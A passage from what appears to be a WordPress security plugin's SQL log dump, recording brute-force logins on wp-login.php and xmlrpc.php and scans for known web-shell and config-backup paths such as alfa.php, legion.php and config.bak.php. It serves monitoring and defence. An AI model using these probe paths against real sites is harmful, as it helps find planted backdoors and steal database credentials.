p-info.php',0,19,0),('185.76.77.160',3108785568,'newd',0,1666261251.4503,152,'0oxXgyVplGcHM49NufbYKIAD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('150.230.247.143',2531719055,'wwwadmin',0,1666265240.0235,152,'nVYOD0IjUKE7kWdXvL8zmhP6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.105.232',866085352,'wadminw',0,1666264551.1560,152,'O02YCnqgiRQXmvBF6hkcAx8l','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.121.5',3098048773,'wwwadmin',0,1666270225.5454,51,'ZyorMktUCXA2L6bnIKRjfmD0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.167.178.158',1604825758,'wadminw',0,1666269003.9337,51,'tHXQRxzGFyLPvO6edo8IAEp3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.32.228.70',773907526,'newd',0,1666267327.5683,7,'rq1CM4ygxp9bBaSVdklzcs7U','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('94.231.86.20',1592219156,'newd',0,1666271209.3554,7,'JqyUs9XoVHcl3Ttm1YkrCpQx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.14.4',2160528900,'newd',0,1666277062.1513,7,'nBTdAYQsX3k9laH2pbGz65DU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('145.239.30.120',2448367224,'newd',0,1666275112.7644,7,'9PMpZsam2Exz7UA0wRFJoeHu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.114.72.18',796018706,'newd',0,1666280982.0528,7,'KsDwVZBbAEFmSQTOqi8kGMlr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1666279044.8776,7,'dHMDt10WlyaXQ7Kj6UrseLZm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.140.0',2319748096,'newd',0,1666292368.8115,7,'yu8kSlpRzY36tJ7g1aZEwP5o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.187.58.136',599472776,'newd',0,1666284877.0779,7,'yhV1Er3DW0zPLqjIemugMGQR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.199.237',2673461229,'newd',0,1666282941.5178,7,'vQa53CWL2Gq9zNZFODnlmwBA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666292368.0866,7,'Dn9O1SZjAW2ovsIQmkTJF0Xp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666290765.5765,7,'NxXv5qLG8VQywaiYgFMJZk94','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.228.214',2673468630,'newd',0,1666288651.6015,7,'GLg60H3kWCEs5nQyh2qAR94a','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('187.32.211.193',3139490753,'newd',0,1666286767.5832,7,'2OG1VDIo3cmuNWY9igZB7XQ6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.0.91',2884894811,'newd',0,1666290522.5470,7,'xckpFf7vjhNlaEPwIiSbTt4K','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666295897.6239,7,'7J2qMSTonHzIserGmRUWZYPy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.69.109.132',574975364,'newd',0,1666294198.3513,7,'Ze0CFn5JWxXVpNgu623AmEGo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666294133.5148,7,'UTA3MsteL2gxl4JoDrEy1Kdu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666299579.3814,7,'RHLW1P5plbM43x2Gh90XUQKI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.61.228',3165011428,'newd',0,1666297895.2704,7,'7fuRaszl2BZvkStdmD1i9IqY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666297728.4241,7,'S2KoHjN9VOfE5W7CU1lhmqzF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.199.237',2673461229,'newd',0,1666296024.0214,7,'xk7gNJoHS2AjWt5sePL0XVay','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.147.241.56',1737748792,'newd',0,1666301590.3928,7,'a90CncHZmoTbu45qUPRyNEGW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666301461.0271,7,'dB1qVZ5L4S6rhW2Tn0oDiJK8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.177.220',2415178204,'newd',0,1666299741.7472,7,'Y06OryXHxgjavKh5VGw4mS7Z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('92.204.138.28',1556908572,'newd',0,1666305318.9935,7,'5WAr8xZFSpKGwHUVv4Jo7tnm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666305267.9659,7,'ylEOgBD7QsiAZWov6TV2UjuM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666303366.5169,7,'ph7lfX4jnEbtUirasexZ5w3O','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.240.13.186',1307577786,'newd',0,1666307193.4342,7,'s9QXupCA4tLUIP7qY3GDvxOd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.169.38.5',346629637,'newd',0,1666307098.9674,7,'DsgCuAxcYrh2RbjMQOLVBzvH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.133.133.193',1736803777,'newd',0,1663715931.2018,7,'O538kiPfEvNrHgF9GSwYRJlt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.133.133.193',1736803777,'justin',0,1663715932.6936,51,'DS8m7zFGhjuE6otJbnKr4aCe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.142.236',2813103852,'newd',0,1663716342.0920,7,'mxRGCObQByziAhEV1ZIawtsj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.110.92.155',3564002459,'newd',0,1663716342.0969,7,'BgyDhjLUckbNVYCiGSKevafw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.240.28.177',2733644977,'newd',0,1663717718.4255,7,'DLamgUs2V0xIpcT1JXCR8SWn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.85.224',2335921632,'newd',0,1663717718.7954,7,'x0D2CYkspn8ryZNoijl3eIAu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.88.33.176',391651760,'',0,1663718133.2400,55,'EdGRq6PL1b7uZXgA03jzIShU','','19|0|0|0|cteisys.com/dup-installer/main.installer.php',0,19,0),('104.131.68.19',1753433107,'newd',0,1663719123.0057,7,'40gmNqY78VFyLBJowrDK65cz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.166.183.192',1738979264,'newd',0,1663719123.9109,7,'2FsiE8eSNzo1OL4aKW3hXtG7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('88.99.133.202',1482917322,'newd',0,1663719184.5919,7,'Mxgz962RJeETq0rV4sWvLnUK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('88.99.133.202',1482917322,'demo1',0,1663719186.0079,51,'vyln7EbYpoSC4RsrFaTNtMw1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1663720508.7452,7,'4gi6bqrSUXtl5OmN2P8zY1EJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('168.119.80.254',2826391806,'newd',0,1663720516.1117,7,'evAuk9l4QGp0XibE2UDPnrzW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('181.174.125.214',3048111574,'newd',0,1663721915.8176,7,'Z0TsgVLG38F1NrUwmAHycOvt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('106.52.120.186',1781823674,'newd',0,1663721918.9253,7,'CyPcmUle0oBFzO69K4bQL2En','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.85',3583549781,'joyce',0,1663722147.5607,152,'Egb68hP0BwQeYU3W5tlNIouM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.141.164',2806484388,'newd',0,1663723334.2924,7,'urNjLte7BUiX24zVsGydoPqM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('106.15.38.206',1779377870,'newd',0,1663723334.3163,7,'c193MBFiJa8CDHVSRyqPWpEU','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.254.90.251',1761499899,'joyce',0,1663724115.9266,152,'7AWpnbjoXKEutwxcm1iNQyFh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.68.15.224',1296306144,'newd',0,1663724292.5419,7,'zTsW3ekO7bmh4juUQxZwvXD0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.68.15.224',1296306144,'webadmin',0,1663724293.9605,51,'sYQPL1jrwnCHe8UVJyTvBkgp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.201.0',2388510976,'newd',0,1663724766.7358,7,'kCPEpA0jVJ8yw9aWvnuDtd3X','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.91.237.106',1432087914,'newd',0,1663724767.5520,7,'Cyrxa8qoUpBNZcFR157S0Ok4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.14.4',2160528900,'newd',0,1663726178.5999,7,'7XRCsiVNx253rB4aylPTpLKW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.22.109.42',2769710378,'newd',0,1663726187.3677,7,'BqLs1QXFoUaJp7d53zbNRK49','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.15.183.168',856668072,'',0,1663727237.1834,55,'DgewMhYSBnyj9OPN6mAX3KiI','','19|0|0|0|cteisys.com/mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php',0,19,0),('161.35.126.102',2703457894,'newd',0,1663727612.4197,7,'sSY4pHjWM9tmr7qFdKcfAw3v','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.249.163.48',1543086896,'newd',0,1663727615.4770,7,'2tjUkVLRPWeGfnDq3YO1lKuX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.186.19',3583556115,'joyce',0,1663728277.8808,152,'HwGUkSNbDOp8CrL24xYzPQeI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.120.217.243',628677107,'joyce',0,1663729032.7482,152,'WjBfDlFnPoIpHAJsuz4i9g5k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1663729037.9339,7,'g84QDV9RHim5N7BwcnyKpMP2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.78.15.126',2018381694,'newd',0,1663729047.6344,7,'bDVRBjt5cG2EnCySlQIKqzfY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.111.116.44',795833388,'newd',0,1663730490.5229,7,'yqgmlACk9ZrSc0vOQ5nJ7f8d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.105.73.13',795429133,'newd',0,1663730491.4226,7,'u3Ec5mKdr96qXWgxAUiFPTlt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.217.190.82',3000614482,'newd',0,1663731909.2360,7,'XZMa14EALe7HVF6vuTpm0bdB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.189',1736628925,'newd',0,1663731914.8843,7,'6QbwTCkLKxzhvsUHISfRjpdn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.237.81.29',2012041501,'newd',0,1663733338.1089,7,'b7HFy43osR0SJu8YvmeZ26fM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('81.88.52.8',1364734984,'newd',0,1663733338.9557,7,'A6iy7tmcR8TOBXsJF4IQvHau','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.167.34.14',1218912782,'newd',0,1663734718.0081,7,'puZWLPc28KT3Ck7nlVsXMy49','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('35.187.58.136',599472776,'newd',0,1663734719.1751,7,'ZnX2i6M391rfQNoTDhLlcV78','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.211.58.145',3000187537,'newd',0,1663734958.9241,7,'FMigeUIm7nyTszj0KqB1rWAx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.211.58.145',3000187537,'jagoda',0,1663734960.5408,51,'N0e8pDLJn2oiXaf4qtdrwS7x','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.110.251',2650107643,'newd',0,1663736101.6991,7,'ChsWSAYq0UeDaTrxyLiF7R3k','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.12.109.223',3104599519,'newd',0,1663737210.5597,7,'JxT4HdwUY5gZIzX71fakOoV9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.12.109.223',3104599519,'demo1',0,1663737212.2900,51,'fuKIGU8Ee0jdoFQwWRXTZ9AY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.151.60',861640508,'newd',0,1663737444.0428,7,'OCjrdkVf6uLMFl7Qyn9zXq24','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('133.130.103.36',2239915812,'newd',0,1663738793.1199,7,'Cnzi52qcFAkf4XUuG79yLPgr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.240.13.186',1307577786,'newd',0,1663738797.3866,7,'oGHrTdByqvWk9XLnpa4tYwzu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.37',3355043365,'joyce',0,1663738919.4792,152,'HXsPzNf2uEl8GFZVIhOy0LK6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('125.227.127.195',2112061379,'newd',0,1663740139.6939,7,'cJ6l4LimTdWBN5UFnwAIHPqX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('166.62.125.246',2789113334,'newd',0,1663740139.7044,7,'jtAxn0rW8lLec6CbRoskHXU5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('176.53.62.61',2956279357,'newd',0,1663740818.9704,7,'U2CiyznrQ6blFc7JkmSEvwPI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('176.53.62.61',2956279357,'user3',0,1663740820.6769,51,'JQF8rceh12jyLUOSCgxK5vVX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.30',3583549726,'joyce',0,1663741227.2174,152,'2Q0mbnshtFp5DwGNLA1dOy6K','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.33',3103917089,'newd',0,1663741479.0974,7,'vKVJ2Egr9BxpDlXoyHw6SMuL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.38.192.91',858177627,'newd',0,1663741479.1040,7,'1CKvfeUQAcWhGBt3qk2LSr9E','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.187.225',3583556577,'joyce',0,1663741862.8933,152,'xNK6wRJtoj413sBSYVkazuW5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.96.74.105',794839657,'newd',0,1663742828.5077,7,'sF3EepiJ9PqHSU4CZIbmzNg6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('94.231.86.20',1592219156,'newd',0,1663742828.5089,7,'TpkNvB4aJ5l3FRhyCrmAOLjM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.182.249.22',2478242070,'newd',0,1663744181.1895,7,'HRCZc5sePkDdbfiFrQvTu2LX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.61.228',3165011428,'newd',0,1663744181.1943,7,'CwFH4kEpsfWVzShlb0MDxILP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.245',2487801589,'newd',0,1663745557.3034,7,'M7cqBatxiJr32VSCwXKDZQUR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.68.122.133',1296333445,'newd',0,1663746020.3681,7,'M8dIXvgKlcEh7F3VRojBJCUq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.68.122.133',1296333445,'marina',0,1663746021.7428,51,'8XdUYVrmhF7BNK09MeDzyPot','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.227.183.25',1088665369,'newd',0,1663746913.4829,7,'zOa0ngpND1IjMBi4qev8uSQh','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.64.96',2813083744,'newd',0,1663746913.4902,7,'hDfbqEX6ISpzKP8VrTJu0nQm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.171.103',3497110375,'newd',0,1663748299.6802,7,'Cg8pQMsz2OA6wFUcj5f37Hti','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('151.106.41.64',2540316992,'newd',0,1663748300.5545,7,'Ci2PTat4Z3WyfMquBszL6mxj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.217.3.120',1608057720,'newd',0,1663748718.6133,7,'MUkX387NlnYFVKpbGjQLq1aI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.217.3.120',1608057720,'user3',0,1663748720.1232,51,'3ZRJ7txrsBjMGvmFf5hS0u6l','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.71.144.12',3225915404,'newd',0,1663749699.0628,7,'KymULXlcu6oeEOV1dp02i3FA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('172.104.156.149',2892536981,'newd',0,1663749699.8557,7,'h2aiOuIyCMzRSfgw7lTLxYqn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('141.94.247.170',2371811242,'newd',0,1663751104.9307,7,'oKnFmsZSCu2qcVHldXk8MiDJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.182.195.110',3518415726,'newd',0,1663751105.7843,7,'mMzeFksGR1aUVh8Kn7YJEAWX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.189',1736628925,'newd',0,1663752490.0100,7,'C1rhpUBROQcY9nzxJjVWuLkv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('164.46.122.50',2754509362,'newd',0,1663752497.4710,7,'BrxX4cJZ0RI1L5vdUPbnMNl9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.5.77',3103917389,'newd',0,1663753924.1622,7,'ck2fzpxCOSXqoJZimlU8L3NP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.144.87.29',2727368477,'newd',0,1663753924.9676,7,'LQ5DiswbGU6Sv9jpV0MK1faJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.149',3583550101,'joyce',0,1663754226.1564,152,'gKrom8wvTij0UPlQWOLBqz24','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('77.68.122.133',1296333445,'newd',0,1663754474.0270,7,'bc3Bv0tNqu8DLpajXihmMQAS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.68.122.133',1296333445,'wp-admin',0,1663754475.3672,51,'7nwsHuxMqLOoZ3DtBRJ86lQE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('61.219.43.253',1037773821,'newd',0,1663755330.5960,7,'s19ZXVAg2yraNUljzCFWKOxf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.245',2487801589,'newd',0,1663755330.5975,7,'Ygf68aHunJAsFzklUb0chG45','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.63.47',2806464303,'newd',0,1663756755.4809,7,'b2xnTjk347VKcPOymFuDZhw5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.128.187.183',2994781111,'newd',0,1663756760.7439,7,'jetR9yLFbIG0XnP1aZi8p3lf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.107.242.103',795603559,'newd',0,1663758195.4565,7,'gxF3qn87AhYPZbBKfC0rXz2d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.250.8',3483040264,'newd',0,1663758202.7433,7,'aHrXR84vkCTUBMoWuExjIOGm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.187.220',3583556572,'joyce',0,1663759207.4446,152,'Xsk7IKRJw9QbndYDygLfp48q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.200.228',2671888612,'newd',0,1663759624.9531,7,'CDcshiFxV73Il4SWz26TL1Uu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.249.163.48',1543086896,'newd',0,1663759632.0974,7,'slZtvKr7gjbQ5mySewNA16iI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.201.0',2388510976,'newd',0,1663761064.7991,7,'PgcRSV8CZrQOFAG9WBtUv3Je','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.105.95',2813094239,'newd',0,1663761071.4693,7,'DHt4jPeSWmJXKFZ9Uld35Y6R','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.226.251.11',1742928651,'newd',0,1663762100.0349,7,'0ZtE9lP6IYRJkMSfDyWqAvuT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.226.251.11',1742928651,'test1234',0,1663762101.9024,51,'Q8LlauErmHDsYVK1O0MnhFek','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.151.60',861640508,'newd',0,1663762519.7529,7,'wI9ZBDKbE5puN1aTVkz3CoqR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.90.36.102',1079649382,'newd',0,1663762520.6682,7,'SCBLZh0vKY7ElAFQT5tbVjG8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1663763962.2051,7,'sKjo3g6eamFl5U7XRCcSAdTO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.199.237',2673461229,'newd',0,1663763963.0585,7,'v1fDeATIYVEQJBNhFkg0dGCt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('193.37.254.11',3240492555,'joyce',0,1663764281.8604,152,'caGfU7rA5CH0FDnIwspRkdYX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.158',1046910110,'joyce',0,1663764928.6274,152,'zB3OK9mnhiCZtTN8GvV2sIPe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.126.102',2703457894,'newd',0,1663765416.2803,7,'iHdvs245YJrnOD6NCkpGgfeq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.76.63.113',575422321,'newd',0,1663765417.1559,7,'r8cMedoFBGWNyj0mvkwhYDbA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.97.205.210',392285650,'newd',0,1663766839.9379,7,'1RTMBLVQr0zIS7ZKpsndFGhx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.54.10',2388473354,'newd',0,1663766847.4115,7,'go524ZGXyW1Eab9rh0QALJnC','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.162',3451483298,'Joyce',0,1663767894.7380,51,'5xjOYrXDom3Rwsk1LvclBZWI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.76.51.29',1347171101,'',0,1663768480.9406,55,'hpfN4JgUPuoHzOyVA2xTFk98','','19|0|0|0|cteisys.com/style.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768483.7069,55,'KE2IknJhexR01qbauXWHZBQy','','19|0|0|0|cteisys.com/moduless.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768485.1367,55,'54rZqt0lacvyJ2gmLkXoH93U','','19|0|0|0|cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768486.2628,55,'npHXUISsr4Zx7R93MYlyLVPk','','19|0|0|0|cteisys.com/admin.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768523.7868,55,'7kMITrQzFE5y9qB6dugNiKCl','','19|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768523.7911,10,'7kMITrQzFE5y9qB6dugNiKCl','','707|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,707,0),('80.76.51.29',1347171101,'',0,1663768525.2468,55,'VLjNrzHgCb9q60JSYlKfyP2e','','19|0|0|0|cteisys.com/wp-content/db_cache.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768528.1846,100,'fVqGbNSJioPRFOxQjIlgBCwh','','13|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768533.2076,100,'KZ7it2vb5np0ch1ErFWHqT4m','','13|0|0|0|cteisys.com/xmlrp.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768535.9291,100,'deDIMajUZHQ8c7i940pEFfLl','','13|0|0|0|cteisys.com/wpindex.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768538.1429,100,'w0sylHbO9pk6CagTdo2x8enu','','13|0|0|0|cteisys.com/larva.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768539.2755,100,'70RfkQxnlMqKGOW1mUAZEdTu','','13|0|0|0|cteisys.com/th3_err0r.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768544.1607,55,'obK8TpA21acV0NsfXthnMEDJ','','19|0|0|0|cteisys.com/alfindex.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768545.6568,55,'tgzQRsAOhkUjqfGbHuZBoDCy','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768547.1365,55,'kUdFCxbsfmAGDLhwS65N78zt','','19|0|0|0|cteisys.com/wp-booking.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768549.2400,55,'TNA61EiM7X2DGLncsvJOkqQF','','19|0|0|0|cteisys.com/cindex.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768553.4667,55,'32k1yzW0euDLXpZ76nQBFofE','','19|0|0|0|cteisys.com/wp-content/wp-1ogin_bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768555.6916,55,'4TulMUpOsg6S1aLw7VvBc9rD','','19|0|0|0|cteisys.com/wp-1ogin_bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768558.1319,55,'ZWGV6uNlHfycqjgwtDQPTdRp','','19|0|0|0|cteisys.com/wp-includes/fonts/css.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768566.3706,55,'0Hy9OCobJuz4j53qBt7PRrLd','','19|0|0|0|cteisys.com/wp-includes/css/css.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768570.1193,55,'i9gO35SZz0B2TerlDqXdub16','','19|0|0|0|cteisys.com/old-index.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768572.9776,55,'YmpH6C9Dq8hBJjbEuSZzMV42','','19|0|0|0|cteisys.com/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768574.2136,55,'tQlwiepxR7UT0yK3g1soku4r','','19|0|0|0|cteisys.com/wp-admin/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768579.8274,55,'vdlNRDgPOxaJ8Ez4o16kbqMw','','19|0|0|0|cteisys.com/wp-content/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768580.9113,55,'LnmvzrgROd5c7HKZAMCktu2Q','','19|0|0|0|cteisys.com/wp-includes/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768585.1496,55,'IfuE3Ky14rWYaxOXnelkZij6','','19|0|0|0|cteisys.com/wp-content/themes/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768586.7481,55,'dk68b3ztixHZMcpDPgjaBKQr','','19|0|0|0|cteisys.com/wp-content/plugins/config.bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768591.8093,18,'rouQB5bSnsOTYgUMAItzhXcl','','13|0|0|0|cteisys.com/wp-includes/css/wp-config.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768593.1252,55,'vPkQ8dLE2TsUpxOt4AnJyaml','','19|0|0|0|cteisys.com/wp-content/plugins/ubh/up.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768594.1927,100,'ylJzbK2h19pXH76DrsqQOPEW','','13|0|0|0|cteisys.com/wp-includes/wpconfig.bak.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768597.5415,100,'pGaOZ3JFzAokD8n0xvQWPEis','','13|0|0|0|cteisys.com/wp-content/plugins/wpconfig.bak.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768607.6036,55,'Apo5r4CwsY1jIEyBFWklG97P','','19|0|0|0|cteisys.com/haders.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768618.4720,100,'HbPaYT6kqgIzWKr7el4oAnu5','','13|0|0|0|cteisys.com/wp-content/wp-old-index.php',0,13,0),('80.76.51.29',1347171101,'',0,1663768630.7672,55,'kNbvIUpBOGx0nAwaECWf7Lir','','19|0|0|0|cteisys.com/legion.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768631.8569,55,'MhsOweaDGExNVWUSpfr0IXFt','','19|0|0|0|cteisys.com/wp-content/mu-plugins/db-safe-mode.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768633.3413,55,'MdNGJoUXtD7Cr5HQu4PsYK3m','','19|0|0|0|cteisys.com/wp-includes/lfx.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768636.3601,55,'Hkhl96mY1WaIjNqTfi4LO735','','19|0|0|0|cteisys.com/wp-includes/small.php',0,19,0),('80.76.51.29',1347171101,'',0,1663768637.7194,55,'hkO4tMQnYUma2ES7y3IbV8cG','','19